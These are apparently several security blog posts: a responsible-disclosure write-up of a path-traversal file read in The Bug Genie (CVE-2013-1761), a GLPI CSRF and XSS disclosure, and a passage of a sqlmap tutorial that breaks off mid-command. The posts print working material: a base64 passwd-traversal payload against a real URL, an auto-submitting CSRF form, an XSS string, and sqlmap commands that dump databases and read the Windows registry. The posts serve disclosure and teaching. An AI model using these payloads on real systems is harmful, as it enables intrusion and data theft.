<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<b><span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">A Little more insight on LFI:</span></span></b></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<div style="text-align: left;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">Its a vulnerability which allows to read files which are present locally on the server having read permissions or <code><span style="font-family: Verdana,sans-serif;">one can also call it</span> </code>a dynamic execution of interpreted code loaded from a file . The attack can be serious when the application allows to read files which are located outside the root directory, which can be done using characters like ../../../../../../ or a ..%2F..%2F..%2F..%2F . This is actually to traverse outside the root directory and to access the files system.</span></span></div>
</div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<b><span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">Few php LFI examples:</span></span></b></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">
<span style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><code><?php
$test = $_GET['id']; </code></span></span><br />
<span style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><code> if(isset($test))
{
include("pages/$test");
}</code></span></span><br />
<span style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><code> else
{
include("index.php");
}</code></span></span><br />
<span style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><code></code></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: x-small;">?></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">In the above example the id parameter is not sanitized to filter out malicious characters like "..%2F", It is easily possible to access any file which is locally stored on the system outside the root directory.</span></span><br />
<br /></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><tt><code></code></tt>Now<code><span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"> </span></span></code>coming back to owncloud the website was bugs.owncloud.org and there was a parameter named "files=" which would fetch the requested file from the server. The parameter was not validating the user input at the server end so it was pretty simple to read any local files having read permissions.</span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">Vulnerable URL: http://bugs.owncloud.org/thebuggenie/serve&g=css&files=</span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">The "files<tt><span style="font-size: small;">"</span></tt> parameter was taking a base64 encoded value which was further decoded at the server end. So i encoded the value for ../../../../../../etc/passwd as Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== and accessed it "http://bugs.owncloud.org/thebuggenie/serve&g=css&files=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==" this read out the most important file from the server.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim1cmf280iSiwSM9d9vcfE6LJIgzuiK-G2C3i9GKnWz5Hop81xxuNRLU08X3Yb4RfDRy_51ukIMcfhnlPyGp6hkooZpdWGKQwShr3rhtowcPcg2Wcyu8iFzP4AOQbLRLi-_ay476omv8M/s1600/LFI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim1cmf280iSiwSM9d9vcfE6LJIgzuiK-G2C3i9GKnWz5Hop81xxuNRLU08X3Yb4RfDRy_51ukIMcfhnlPyGp6hkooZpdWGKQwShr3rhtowcPcg2Wcyu8iFzP4AOQbLRLi-_ay476omv8M/s320/LFI.png" height="184" width="320" /></a></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">I reported the vulnerability to owncloud and they replied saying its a issue with "The Bug Genie". Lukas Reschke helped me to get in touch with the Bug Genie developers. They realized the criticality of the bug and quickly rolled out a fix within a week and assigned me a CVE id "CVE-2013-1761". They also acknowledged my contribution on their new software release <a href="http://www.thebuggenie.com/security/TBGSN-001-1" target="_blank">here.</a></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">I also want to mention <a href="https://www.statuscode.ch/" target="_blank">Lukas Reschke</a> for helping me get a CVE id.</span></span></div>
</div>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-90408260608218792612012-10-16T04:33:00.003-07:002014-10-21T23:12:19.240-07:00Multiple CSRF and XSS vulnerabilities in GLPI - CVE-2012-4002/CVE-2012-4003<div dir="ltr" style="text-align: left;" trbidi="on">
Few months back when i was researching on few resource management softwares i came across this amazing Resource manager (<a href="http://www.glpi-project.org/spip.php?lang=en" target="_blank">GLPI</a>). After deploying it on my xampp server i started my initial phase of finding bugs.<br />
The installed version of GLPI was 0.83.2 which i found was having multiple CSRF issues, some of the important functions which includes adding new users or raising a ticket lacked a proper CSRF mitigation.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJJLUKruFgp3092l_q7xVTFBCPFRh4pBiI7kH_zKwtmfRPxsrdss6gxhSodojMQIjQ-tXlNv5ANmQJCNIhzYUj77YWetzCDJNra0KJMU4SaNvzWKh_V8ZBHOy1x33fHcmR6g6riA-dVvM/s1600/GLPI+-+Authentication_1350380606926.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJJLUKruFgp3092l_q7xVTFBCPFRh4pBiI7kH_zKwtmfRPxsrdss6gxhSodojMQIjQ-tXlNv5ANmQJCNIhzYUj77YWetzCDJNra0KJMU4SaNvzWKh_V8ZBHOy1x33fHcmR6g6riA-dVvM/s320/GLPI+-+Authentication_1350380606926.png" height="177" width="320" /></a></div>
<br />
I found that most of the user related tasks were vulnerable to CSRF attack. Here is a small POC on adding a new user. The page at http://<localhost>/glpi/front/preference.php allows us to add a user.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9MaoKJxA0qR0Qi4-Wp1md3Quj05Kba2X6qzxTObZHC9TKsLTnJXwGwvE1wSoGuBwXQeIK0h83Wvr0QPY5GNW3S0ObTDTBQ1wu6PEuTzB5gsXHWLAbHUC3Ntkzj0pOOUvUmFqUphQscr0/s1600/GLPI+-+User+Information_1350387624748.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9MaoKJxA0qR0Qi4-Wp1md3Quj05Kba2X6qzxTObZHC9TKsLTnJXwGwvE1wSoGuBwXQeIK0h83Wvr0QPY5GNW3S0ObTDTBQ1wu6PEuTzB5gsXHWLAbHUC3Ntkzj0pOOUvUmFqUphQscr0/s320/GLPI+-+User+Information_1350387624748.png" height="177" width="320" /></a></div>
<br />
And after clicking on update the following POST request is sent to the server.<br />
<br />
<br />
POST http://localhost/glpi/front/preference.php HTTP/1.1<br />
Host: localhost<br />
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-us,en;q=0.5<br />
Proxy-Connection: keep-alive<br />
Cookie: PHPSESSID=bstsomr0qf11n0446gqai8gp03<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 72<br />
<br />
name=glpi&id=2&realname=Attacker&language=en_GB&use_mode=0&update=Update<br />
<br />
Since there is no CSRF token in the post request an attacker can easily create a html page and send to a logged-in administrator and can create him as an authenticated user without the administrator knowing about it.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNZWPFx5MRNUyOIPqNEfVLKb6d3zdhZVf6THcyITUh0GsW5ah2xGyYNzka5OlLkFn3l72b_nMqJMfZk-oygHOy82YxHumfM3vXzvfrylUPKJ7cPOxYO_du0v8TL3QJ6zDfsmRYQnRmDVM/s1600/csrf.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNZWPFx5MRNUyOIPqNEfVLKb6d3zdhZVf6THcyITUh0GsW5ah2xGyYNzka5OlLkFn3l72b_nMqJMfZk-oygHOy82YxHumfM3vXzvfrylUPKJ7cPOxYO_du0v8TL3QJ6zDfsmRYQnRmDVM/s320/csrf.PNG" height="188" width="320" /></a></div>
<br />
<br />
<br />
Html POST-CSRF eg:<br />
<br />
<html><br />
<body onload=csrf.submit()><br />
<form id="csrf" name="csrf" action="http://localhost/glpi/front/preference.php" method="POST"><br />
<input type=hidden name="name" id="name" value="glpi"/><br />
<input type=hidden name="id" id="id" value="2"/><br />
<input type=hidden name="realname" id="realname" value="Attacker"/><br />
<input type=hidden name="language" id="language" value="en_GB"/><br />
<input type=hidden name="use_mode" id="use_mode" value="0"/><br />
<input type=hidden name="update" id="update" value="Update"/><br />
</form><br />
</body><br />
</html><br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDyq4Np9egt80VzB9zsQzPVU6Vk8YaQAEjhAM9UIEoLei0xzn1zFRPyLUToZ3UZ_NPtpsCytW7cCNmjpdsGn17tf3ECQSau6xcmPe_5pxH-qs9HRvwXcPYJojVmHMcoAdu017pG5c64qc/s1600/attacker.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDyq4Np9egt80VzB9zsQzPVU6Vk8YaQAEjhAM9UIEoLei0xzn1zFRPyLUToZ3UZ_NPtpsCytW7cCNmjpdsGn17tf3ECQSau6xcmPe_5pxH-qs9HRvwXcPYJojVmHMcoAdu017pG5c64qc/s320/attacker.PNG" height="240" width="320" /></a></div>
<br />
Here are few more locations which didn't had CSRF protection:<br />
<br />
http://localhost/glpi/front/user.form.php?id=3<br />
http://localhost/glpi/front/user.form.php?id=2<br />
http://localhost/glpi/front/user.form.php?id=5<br />
http://localhost/glpi/front/user.form.php?id=4<br />
http://localhost/glpi/front/user.form.php?new=1<br />
http://localhost/glpi/front/profile.form.php?id=3<br />
http://localhost/glpi/front/ruleimportcomputer.form.php<br />
http://localhost/glpi/front/popup.php?popup=edit_bookmark<br />
http://localhost/glpi/front/group.form.php<br />
http://localhost/glpi/front/entity.form.php<br />
http://localhost/glpi/front/popup.php<br />
http://localhost/glpi/front/auth.settings.php<br />
http://localhost/glpi/front/crontask.php?execute=*<br />
http://localhost/glpi/front/fieldunicity.form.php<br />
http://localhost/glpi/front/config.form.php<br />
http://localhost/glpi/front/notificationmailsetting.form.php<br />
http://localhost/glpi/front/*?reset=reset<br />
http://localhost/glpi/front/backup.php?<br />
<br />
<br />
Apart from CSRF the application also had an XSS flaw at http://localhost/glpi/front/config.form.php where there was an option we could provide text on login. This parameter was not sanitized from the back end and it would easily accept any malicious characters. A simple "><script>alert(1)</script> would prompt 1 on the login screen.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheGSBNLfDnkHQ3s4JB3xeoxRLpMu03LVLPode5dKuWt5Gk20Jw3s-akXfbIuaZbZbxvomxP6ryOBVfos8YovxIWjn2UMeqLXBWlBjMTBhbAF_9KrY29bfJT62svVe0V4yS9y4kRA2wkhI/s1600/Xss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheGSBNLfDnkHQ3s4JB3xeoxRLpMu03LVLPode5dKuWt5Gk20Jw3s-akXfbIuaZbZbxvomxP6ryOBVfos8YovxIWjn2UMeqLXBWlBjMTBhbAF_9KrY29bfJT62svVe0V4yS9y4kRA2wkhI/s320/Xss.PNG" height="240" width="320" /></a></div>
<br />
<br />
<br />
The GLPI security team was very prompt and cooperative in handling all my reported issues. And a few weeks back they came up with a new secure version of GLPI 0.83.3 with XSS and CSRF protection.<br />
<br />
Thanks GLPI team for acknowledging me on their new software release (<a href="http://www.glpi-project.org/spip.php?page=annonce&id_breve=277&lang=en" target="_blank">click</a>).<br />
<br />
<br />
<br />
<br />
<br /></div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-10793154848001729502012-10-08T00:33:00.001-07:002016-05-08T21:46:14.102-07:00SQL Injection made simple<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: "verdana" , sans-serif;">SQL injection has been ruling the OWASP top ten for many years. It is the most powerful and feared vulnerability among all. It is "THE BAAP" of all living vulnerabilities found till date, thus finding it and further exploiting it becomes a challenge sometimes. There are zillions of ways to identify but some times exploiting the right way becomes a challenge for a pentester.</span><br />
<span style="font-family: "verdana" , sans-serif;">Here is an easy method for beginners to expert level for sql exploitation using my favorite tool SqlMap.</span><br />
<span style="font-family: "verdana" , sans-serif;">SqlMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">SQL injection attacks are the one in which SQL commands are injected into data-plane in order to affect the execution of predefined SQL statements.</span></span><br />
<h3 style="text-align: left;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-weight: normal;">SQL injection can lead into :</span></h3>
<span style="font-family: "verdana" , sans-serif;">a) DBMS data manipulation</span><br />
<span style="font-family: "verdana" , sans-serif;">b) File system read and write access</span><br />
<span style="font-family: "verdana" , sans-serif;">c) Operating system control</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">SQLMAP- http://sqlmap.courceforge.net</span></span><br />
<span style="font-family: "verdana" , sans-serif;">INTRO>> An open source command-line tool</span><br />
<span style="font-family: "verdana" , sans-serif;"> Detects and exploits SQL injection flaws in Web applications</span><br />
<span style="font-family: "verdana" , sans-serif;"> Developed in Python -july 2006</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"> </span></span><br />
<span style="font-family: "verdana" , sans-serif;">KEY FEATURES>> Full support for MySQL,PostgreSQL,Oracle,MSSQL</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif;">TECHNIQUES>> Boolean-based blind</span></div>
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"> Union query</span></div>
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"> stacked(batched) query</span></div>
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"> </span></div>
<span style="font-family: "verdana" , sans-serif;">It does an extensive back-end DBMS fingerprint, Enumerates users, passwords, databases, tables, and columns.</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Disclaimer: Please do not test it on any live website without prior permission of the website owner. The author assumes no liability and is not responsible for any damage caused. I recommend hosting Mutillidae/Webgoat/DVWA on a virtual machine to practice (I have used Mutillidae to explain beginner level exploitation (more info on Mutillidae could be found <a href="http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10" target="_blank">here</a>) for advance level i have used a custom made web application designed by our team *webmart(aspx/mssql) )</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Prerequistes>> Backtrack5 (www.backtrack-linux.org)</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Here we go!!</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">One of my favorite combination of commands to start with!</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">a) python sqlmap.py -u "http://abc/mutillidae/index.php?page=login.php" --level=3 --forms --batch --banner --flush-session</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">This would fetch you many things like the back-end Database, banner grab, and it will also do a form search on the page and see if any of the parameter are injectable. As shown below the database is MySQL 5.0, the parameter username is injectable and the platform is php 5.3.3 on Apache 2.2.16. Woooaaa! tats a lot of info on first run.</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "verdana" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWqTVvgErLaDacLGuFpOiRrTd1pP5YNtmWlcc0N6J6M4hVuF_W-3qhc0LQR4J_sricwMwUwgil2CiekbhlsJcAyLYVlFeCu6iWjGf54pDD871_gxrMdtqUpQAWdU9DQ0RYKayZEHr2uSA/s1600/output1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWqTVvgErLaDacLGuFpOiRrTd1pP5YNtmWlcc0N6J6M4hVuF_W-3qhc0LQR4J_sricwMwUwgil2CiekbhlsJcAyLYVlFeCu6iWjGf54pDD871_gxrMdtqUpQAWdU9DQ0RYKayZEHr2uSA/s320/output1.PNG" width="320" /></a></span></div>
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">b) python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3 --data="username=test&password=test&login-php-submit-button=Login" --flush-session --tables --dbs --batch</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Here we are providing the POST data (username=test&password=test&login-php-submit-button=Login) and telling sqlmap to enumerate all the table entries and use the default behavior without asking user input. The current user running is 'root@localhost'. Here we have a lot of info to understand the back-end of the application.</span></span><br />
<br />
<h3 style="text-align: left;">
<span style="font-family: "verdana" , sans-serif;"><span style="font-weight: normal;">Few more ways for to dump database.</span></span></h3>
<br />
<span style="font-family: "verdana" , sans-serif;">
<span style="font-family: "verdana" , sans-serif;">python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3 --data="username=test&password=test&login-php-submit-button=Login" --flush-session --tables --dump-all -D "database to enumerate" --batch</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span><span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "verdana" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhAWZyuhIEdbJJYEWQw_tW-WN2J-v5mTe_ZIdCjmXLV6QsEIAa9nfzr4X_9hpjTghLCLEZAVKbfJVAeR3bkhxlIJL4Qzaa9FppnMNrfrw_qkOCcGTyAh3-GLT78E4e0gQ_TWAhDeQBj5s/s1600/output2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhAWZyuhIEdbJJYEWQw_tW-WN2J-v5mTe_ZIdCjmXLV6QsEIAa9nfzr4X_9hpjTghLCLEZAVKbfJVAeR3bkhxlIJL4Qzaa9FppnMNrfrw_qkOCcGTyAh3-GLT78E4e0gQ_TWAhDeQBj5s/s320/output2.PNG" width="320" /></a></span></div>
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<h3 style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-weight: normal;">Enumerate table Columns:</span></span></h3>
<span style="font-family: "verdana" , sans-serif;">
<span style="font-family: "verdana" , sans-serif;">python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3 --data="username=test&password=test&login-php-submit-button=Login" --flush-session -D "database to enumerate" -T "table name" --columns --batch</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Now if the column names are not common enough to enumerate then brute forcing is a better option. For a brute force check:</span></span><br />
<span style="font-family: "verdana" , sans-serif;">python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3 --data="username=test&password=test&login-php-submit-button=Login" --flush-session -D "database to enumerate" -T "table name" --common-tables --common-columns --batch</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">These are some of the easy ways to do SQL injection. Now raising the bar a little high we will try exploiting a Windows system running MSSQL 2005. Here sqlmap first uploads a dynamic-linked library (DLL) used afterwards to create two user-defined functions (sys_exec() and sys_bineval()) in the database it also uses a stored procedure (xm_cmdshell) to further exploit. This is a built in stored procedure to execute commands used by MSSQL, it is enabled by default in MSSQL 2000, and for 2005 and 2008 it is disabled by default. This procedure can be also re-enabled if the current session user is a member of sysadmin role. sp_configure stored procedure can be used to re-enable it [works fine on MSSQL 2005/08]</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Here our final aim is to own the windows box hosting a webapplication (webmart) [aspx/mssql] but before that we will try doing some very awesome things with sqlmap.</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<h3 style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-weight: normal;">Check If remote system has RDP enabled:</span></span></h3>
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --reg-read --reg-key="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" --reg-value=fDenyTSConnections --batch</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">If the output is a 0 then it is enabled if its 1 then its not. If its 1 then we can enable RDP remotely using sqlmap!</span></span><br />
<h3 style="text-align: left;">
<span style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif; font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></span><span style="font-family: Verdana, sans-serif;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Enabling RDP using Sqlmap:</span></span></span></h3>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">python sqlmap.py -u "http://abc/login.aspx"
